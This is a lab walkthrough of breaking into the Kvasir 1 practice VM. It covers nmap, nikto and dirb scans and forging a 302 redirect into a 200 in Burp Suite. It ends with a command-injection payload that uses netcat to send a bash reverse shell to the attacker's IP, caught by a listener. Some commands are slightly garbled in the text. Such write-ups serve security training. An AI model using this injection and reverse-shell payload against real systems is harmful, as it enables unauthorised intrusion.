Kvasir 1 Vm Walkthrough

It has Linux operating system that has Virtual Machine OVA format. Environment:

Attacker Machine is Kali Linux 192.168.44.136 Victim Kvasir 192.168.44.129

When you start the Kvasir VM it will look something as follows: Debian GNU/Linux 7 kvasir tty1 Kvasir Login:

Let’s us do nmap aggressive and version scan on the target VM with the help of the following command: #nmap –A –sV 192.168.44.129

Nmap results show that only port 80/tcp is open that serves HTTP and contains Apache httpd 2.2.22 Debian installation. Now let us visit the site by entering the following in the URL: http://192.168.44.129

As seen below a login page will appear. Now let us put Nikto scan in parallel. The command used for website scanning with Nikto is: #nikto –h http://192.168.44.129

Also, let us put on scan directory buster parallel. The following command is used for enumerating the directory on kvasir: #dirb http:/192.168.44.129

By analyzing the output, we can make out that we have to consider the following URL for testing: http://192.168.44.129/admin.php http://192.168.44.129/index.php Let us visit admin page first. As the page has a 302 redirect, it can be seen in burp suite.

As we would like to see the admin.php in our browser, we request to server http://192.168.44.129/admin.php Response from the server:

Now edit 302 to 200 as shown below

After changing the response forward it to the browser, and you will see the following page on the browser:

Service check instruction sounds a good area for command injection. As the status of a service can be found by executing the following command in the terminal: service apache2 status Assuming our input will be executed on the terminal we can try for command injection. Well, I tried few syntax, few commands but the commands failed. Compiling a correct syntax was a bit difficult task. The following command was able to give me shell access: #curl –data”service=ssh; netcat –e /bin/bash 192.168.44.136 1234; id #&submit=Submit http://192.168.44.129/admin.php

A listener was setup on port 1234 for any incoming connection. The command used was: #nc –lvvp 1234

Finally, I got the shell.